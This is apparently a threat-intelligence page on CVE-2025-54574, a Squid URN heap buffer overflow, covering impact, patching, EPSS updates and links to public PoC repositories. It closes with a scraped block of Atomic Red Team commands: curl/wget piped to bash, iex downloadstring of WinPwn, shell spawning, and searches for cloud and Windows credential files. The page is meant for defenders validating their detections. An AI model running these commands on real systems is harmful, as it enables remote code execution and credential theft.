CVE-2025-54574
Overview
This vulnerability is a heap-based buffer overflow caused by improper buffer management during processing of Uniform Resource Names (URN) within the Squid caching proxy. The flaw resides in the component responsible for handling URN access permissions, where insufficient bounds checking allows memory corruption. The affected feature is the URN processing logic in Squid versions 6.3 and earlier.
Vulnerability Description
Squid is a caching proxy for the Web. In versions 6.3 and below, Squid is vulnerable to a heap buffer overflow and possible remote code execution attack when processing URN due to incorrect buffer management. This has been fixed in version 6.4. To work around this issue, disable URN access permissions.
Impact
An unauthenticated remote attacker can exploit this vulnerability by sending specially crafted URN requests to the Squid proxy server, resulting in heap memory corruption. This can lead to arbitrary code execution with the privileges of the Squid process, potentially allowing full system compromise or denial of service. The attack requires network access to the proxy server and no user interaction. The CVSS vector indicates low attack complexity and no privileges required (AV:N/AC:L/PR:N/UI:N).
Solution
Upgrade Squid to version 6.4 or later, where the heap buffer overflow in URN processing is fixed, as detailed in the GitHub advisory GHSA-w4gv-vw3f-29g3 and release notes at https://github.com/squid-cache/squid/releases/tag/SQUID_6_4. As a temporary mitigation, disable URN access permissions to prevent exploitation. Refer to the official Squid security advisory and patch commit a27bf4b84da23594150c7a86a23435df0b35b988 for precise patching instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the caching proxy software, Squid, arises from a heap buffer overflow that occurs during the processing of Uniform Resource Names (URNs). This flaw is primarily due to improper buffer management, which can lead to memory corruption. When an attacker sends a specially crafted URN request to the affected versions of Squid (specifically 6.3 and below), it can exploit this vulnerability to overwrite adjacent memory spaces. This can result in arbitrary code execution, allowing the attacker to execute malicious payloads on the server hosting the Squid proxy. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk level.
Attack vectors for exploiting this vulnerability are primarily remote, as the Squid proxy is often exposed to the internet to facilitate web caching and content delivery. An attacker could leverage this flaw by sending malformed URN requests to the proxy server. If successful, the attacker could potentially gain control over the server, leading to unauthorized access to sensitive data, disruption of services, or the deployment of further attacks within the network. Exploitation scenarios may include using the compromised server as a launchpad for attacks against internal systems, thereby increasing the attack surface and complicating incident response efforts.
The real-world impact of this vulnerability can be significant for organizations relying on Squid for web caching and proxy services. A successful exploitation could lead to severe business risks, including data breaches, loss of customer trust, and potential regulatory penalties, especially if sensitive information is exposed. Furthermore, the operational disruption caused by a compromised proxy server can lead to downtime and associated financial losses. Organizations that fail to address this vulnerability may also face reputational damage, as news of such incidents can spread quickly, affecting customer confidence and market position.
To detect and mitigate this vulnerability, organizations should first ensure they are running the latest version of Squid, as version 6.4 addresses this issue. Regular patch management practices should be implemented to keep all software up to date, reducing the risk of exploitation from known vulnerabilities. Additionally, disabling URN access permissions can serve as a temporary workaround until the software is updated. Organizations should also consider employing intrusion detection systems (IDS) to monitor for unusual traffic patterns that may indicate attempts to exploit this vulnerability. Regular security audits and vulnerability assessments can further bolster defenses by identifying and remediating potential weaknesses in the infrastructure.
In conclusion, the heap buffer overflow vulnerability in Squid presents a critical risk that can lead to severe consequences for affected organizations. Understanding the technical details, potential attack vectors, and real-world impacts is essential for cybersecurity professionals tasked with safeguarding their networks. By implementing robust detection and mitigation strategies, organizations can significantly reduce their exposure to this vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has identified a marked escalation in the exploitability of CVE-2025-54574, as reflected by a substantial increase in the Exploit Prediction Scoring System (EPSS) score. This surge indicates growing attacker interest and a higher likelihood of active exploitation attempts in the wild. Concurrently, new proof-of-concept exploits have emerged on public repositories, lowering the barrier for threat actors to weaponize this heap buffer overflow vulnerability in Squid proxy versions 6.3 and below. Our telemetry shows a consistent upward trend in exploitation-related activity, underscoring an evolving threat landscape where opportunistic adversaries may leverage this flaw for remote code execution. This development elevates the urgency for defenders to reassess their risk posture, as the vulnerability’s critical severity is now compounded by increased exploit availability and demonstrated proof-of-concept code. The heightened EPSS percentile ranking further signals that this vulnerability is among the most likely to be exploited imminently, warranting intensified monitoring and prioritization within vulnerability management programs.
Update 2 — July 30, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2025-54574, indicating increased adversary interest and potential exploitation attempts. While the overall EPSS score has shown a slight decline, this metric remains near its peak percentile, underscoring sustained exploitation likelihood. The emergence of additional proof-of-concept exploits on public platforms further lowers the barrier for threat actors to weaponize this vulnerability. Our telemetry suggests that this uptick is not isolated but part of a broader trend of opportunistic scanning and probing targeting vulnerable Squid proxy deployments. This evolving landscape elevates the threat level, as adversaries gain easier access to reliable exploit code and intensify reconnaissance efforts, thereby increasing the risk of successful remote code execution attacks. Defenders should interpret these developments as a signal of heightened operational tempo among malicious actors focusing on this critical flaw.
Update 3 — August 17, 2026
CSURFACE threat intelligence has identified a marked escalation in scanning and exploitation attempts targeting the Squid heap buffer overflow vulnerability. This surge coincides with the wider dissemination of new proof-of-concept exploits on public repositories, which lowers the technical barrier for adversaries to conduct remote code execution attacks. Our telemetry indicates that threat actors are increasingly incorporating this vulnerability into their reconnaissance and initial access toolkits, signaling a shift from opportunistic probing to more deliberate exploitation campaigns. While the EPSS score remains stable, the qualitative increase in activity and the availability of reliable exploit code collectively elevate the operational risk. Defenders should recognize this trend as an indication of growing adversary focus and sophistication, which amplifies the likelihood of successful compromise in environments running vulnerable Squid versions.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Squid-Cache | Squid | All |
cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
gmh5225/Blackash-CVE-2025-54574
CVE-2025-54574
|
gmh5225 | 0 | 1 | 2025-08-05 | View |
|
starrynightsecurity/CVE-2025-54574-Squid-Heap-Buffer-Overflow
Vulnerability Found on Squid Proxy.
|
starrynightsecurity | 0 | 0 | 2025-11-17 | View |
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-54574 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/squid-cache/squid/security/advisories/GHSA-w4gv-vw3f-29g3 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/squid-cache/squid/commit/a27bf4b84da23594150c7a86a23435df0b35b988 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/squid-cache/squid/releases/tag/SQUID_6_4 |
| openwall.com |
NVD API
|
http://www.openwall.com/lists/oss-security/2025/11/05/5 |
| lists.debian.org |
NVD API
|
https://lists.debian.org/debian-lts-announce/2025/09/msg00027.html |